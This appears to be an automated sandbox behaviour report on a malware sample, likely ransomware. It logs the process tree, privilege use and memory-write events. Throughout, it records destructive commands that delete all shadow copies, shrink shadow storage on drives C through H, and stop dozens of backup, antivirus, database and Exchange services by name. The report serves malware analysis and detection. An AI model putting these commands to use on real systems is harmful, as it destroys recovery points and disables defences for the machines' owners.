File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2412 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 400 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 948 wrote to memory of 2912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 864 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3956 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3856 wrote to memory of 2756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2412 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3456 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe

Processes

C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\SysWOW64\net.exe

net stop AcronisAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net.exe

net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Antivirus /y

C:\Windows\SysWOW64\net.exe

net stop Antivirus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Antivirus /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ARSM /y

C:\Windows\SysWOW64\net.exe

net stop ARSM /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ARSM /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop bedbg /y

C:\Windows\SysWOW64\net.exe

net stop bedbg /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop bedbg /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop DCAgent /y

C:\Windows\SysWOW64\net.exe

net stop DCAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop DCAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPSecurityService /y

C:\Windows\SysWOW64\net.exe

net stop EPSecurityService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPSecurityService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPUpdateService /y

C:\Windows\SysWOW64\net.exe

net stop EPUpdateService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPUpdateService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net.exe

net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EraserSvc11710 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EsgShKernel /y

C:\Windows\SysWOW64\net.exe

net stop EsgShKernel /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EsgShKernel /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop FA_Scheduler /y

C:\Windows\SysWOW64\net.exe

net stop FA_Scheduler /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop FA_Scheduler /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IISAdmin /y

C:\Windows\SysWOW64\net.exe

net stop IISAdmin /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IISAdmin /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IMAP4Svc /y

C:\Windows\SysWOW64\net.exe

net stop IMAP4Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IMAP4Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McShield /y

C:\Windows\SysWOW64\net.exe

net stop McShield /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McShield /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McTaskManager /y

C:\Windows\SysWOW64\net.exe

net stop McTaskManager /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McTaskManager /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfemms /y

C:\Windows\SysWOW64\net.exe

net stop mfemms /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfemms /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfevtp /y

C:\Windows\SysWOW64\net.exe

net stop mfevtp /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfevtp /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MMS /y

C:\Windows\SysWOW64\net.exe

net stop MMS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MMS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mozyprobackup /y

C:\Windows\SysWOW64\net.exe

net stop mozyprobackup /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mozyprobackup /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer110 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeES /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeES /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeES /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeIS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeIS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeIS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMGMT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMTA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSRS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MySQL57 /y

C:\Windows\SysWOW64\net.exe

net stop MySQL57 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MySQL57 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ntrtscan /y

C:\Windows\SysWOW64\net.exe

net stop ntrtscan /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ntrtscan /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net.exe

net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop OracleClientCache80 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\SysWOW64\net.exe

net stop PDVFSService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop POP3Svc /y

C:\Windows\SysWOW64\net.exe

net stop POP3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop POP3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop RESvc /y

C:\Windows\SysWOW64\net.exe

net stop RESvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop RESvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sacsvr /y

C:\Windows\SysWOW64\net.exe

net stop sacsvr /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sacsvr /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SamSs /y

C:\Windows\SysWOW64\net.exe

net stop SamSs /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SamSs /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVAdminService /y

C:\Windows\SysWOW64\net.exe

net stop SAVAdminService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVAdminService /y

